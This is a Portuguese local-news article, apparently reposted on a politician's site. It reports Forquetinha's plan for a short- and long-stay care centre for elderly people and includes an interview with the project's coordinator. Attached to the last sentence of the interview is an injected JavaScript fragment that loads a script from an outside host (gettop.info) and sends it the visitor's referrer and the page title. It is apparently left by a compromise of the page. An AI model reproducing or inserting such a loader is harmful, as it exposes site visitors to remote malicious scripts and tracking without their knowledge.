Forquetinha: TERCEIRA IDADE: Município terá centro de permanência
- Posted by: Ass. imprensa
- Posted in Beto na Mídia
- Tags:
O Informativo do Vale – Lajeado, 17/12/2009
Projeto já está em Brasília e deve se tornar realidade em breve. Lideranças que estiveram na capital federal retornaram otimistas
Forquetinha – A Administração Municipal está prestes a concretizar uma das metas propostas estipuladas desde o início do mandato do prefeito Waldemar Richter. “Estamos saindo do sonho para a realidade em relação a nossas intenções para com as pessoas idosas”, destaca o chefe do Executivo ao afirmar que desde sua primeira administração teve preocupação com a terceira idade. “É um cuidado especial. Temos muita consideração e valorizamos essas pessoas que tanto fizeram por Forquetinha e ainda estão fazendo. Já construímos um belo salão de eventos, moderno e adequado, digno de toda a infraestrutura para festas e bailes. Mas queremos muito mais”, justifica ao anunciar para breve a construção de um Centro de Curta e Longa Permanência. “Em breve será realidade com a edificação de um espaço considerado inédito na região.”
O projeto está sendo idealizado e coordenado por Ledi Rejane Storck Baum, que recentemente acompanhou o prefeito Richter a Brasília com a líder do governo no Legislativo, a vereadora Inês Schwingel Feil. Eles apresentaram a proposta ao Ministério da Saúde a fim de buscar recursos.
LEDI BAUM
“A criação do espaço vai garantir um lugar tranquilo e seguro aos idosos”
O Informativo do Vale – O que será esse centro?
Ledi – Será um local com amplo espaço físico e atendido por profissionais qualificados que possam dar atenção especial às pessoas idosas, principalmente por não terem um local adequado para o repouso e tratamento. No local haverá ambulatório para procedimentos médicos e enfermagem, farmácia interna, auditório, 30 leitos, sala de fisioterapia, enfermaria, sala de ginástica, solário e espaço para recreação, caminhadas e lazer, entre outros.
O Informativo do Vale – De onde partiu a ideia?
Ledi – Como um dos grandes objetivos da Administração Municipal é a atenção especial à terceira idade, elaboramos o Projeto Centro de Curta e Longa Permanência, que será destinado para essas pessoas a fim de que possam ter cuidados adequados e dignos.
O Informativo do Vale – As dimensões do prédio já estão definidas?
Ledi – Será feito um estudo com os técnicos do Ministério da Saúde.
O Informativo do Vale – Existe projeto semelhante na região?
Ledi – Não temos conhecimento. Acreditamos que não. É um projeto audacioso que nós estamos criando para o nosso município, mas com abrangência regional, conforme nossa realidade.
O Informativo do Vale – Por quem será mantido esse empreendimento?
Ledi – Depois de concluído, nossa intenção é formar uma Associação de Voluntários. Também as famílias devem colaborar com recursos financeiros e haverá verbas governamentais.
O Informativo do Vale – Já está definido o local para a construção do prédio?
Ledi Baum – Será numa área nobre doada por uma família do município que por enquanto prefere não se identificar.
O Informativo do Vale – Como estão os trâmites do projeto em Brasília?
Ledi – A ideia do projeto foi apresentada ao deputado federal Beto Albuquerque, que se impressionou. Ele conseguiu uma audiência com o chefe de gabinete do Ministro da Saúde. O projeto se enquadra num dos programas do governo federal e recebemos orientações técnicas, sendo que eles se colocaram à disposição para nos auxiliar na elaboração e montagem do mesmo, bem como para a liberação de recursos.
O Informativo do Vale -Qual a importância desse centro para o município?
Ledi – São diversas. Cada vez mais os filhos trabalham fora e têm mais compromissos profissionais. As crianças passam o dia nas creches. Os filhos, quando frequentam o Ensino Médio, começam a trabalhar e, com tudo isso, os avós acabam ficando sozinhos. Quando um adoece, fica só. E quando só se tem um dos avós a situação já dificulta mais. E aí tudo complica, pois se precisar de alguém para cuidar em caso de doença, tem que ser de dia e de noite. Os filhos não podem parar de trabalhar e os idosos acabam ficando meio abandonados. A criação desse centro é para destiná-los para um lugar tranquilo e seguro. Em outros casos, quando recebem alta do hospital, necessitam de cuidados especiais e será então, nessa instituição, que eles poderão ser bem cuidados. O Centro de Curta e Longa Permanência será uma solução para idosos durante a semana, e que podem voltar nos fins de semana para a casa dos filhos. Enfim, são diversas situações que justificam a construção desse empreendimento.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;